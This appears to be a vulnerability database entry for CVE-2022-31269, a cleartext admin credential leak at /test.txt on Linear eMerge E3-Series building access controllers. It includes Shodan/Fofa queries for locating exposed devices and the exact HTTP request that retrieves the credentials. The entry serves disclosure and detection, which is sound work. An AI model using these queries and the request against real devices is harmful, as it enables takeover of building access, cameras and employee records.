| Title | Linear eMerge E3-Series - Information Disclosure |
|---|---|
| Author | For3stCo1d |
| Severity | High |
| Impact | An attacker can exploit this vulnerability to gain sensitive information from the device. |
| Remediation | Apply the latest firmware update provided by the vendor to fix the vulnerability. |
| CVSS Score | 8.2 |
| EPSS Score | 0.6816 |
| CVE ID | CVE-2022-31269 |
| CWE ID | CWE-798 |
| Shodan Query | http.title:"Linear eMerge"http.title:"emerge"http.title:"linear emerge" |
| Fofa Query | title="emerge"title="linear emerge" |
| Tags | cve cve2022 emerge exposure packetstorm nortekcontrol vuln |
Linear eMerge E3-Series devices are susceptible to information disclosure. Admin credentials are stored in clear text at the endpoint /test.txt in situations where the default admin credentials have been changed. An attacker can obtain admin credentials, access the admin dashboard, control building access and cameras, and access employee information.
GET /test.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-31269.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-31269.pcap
N/AN/A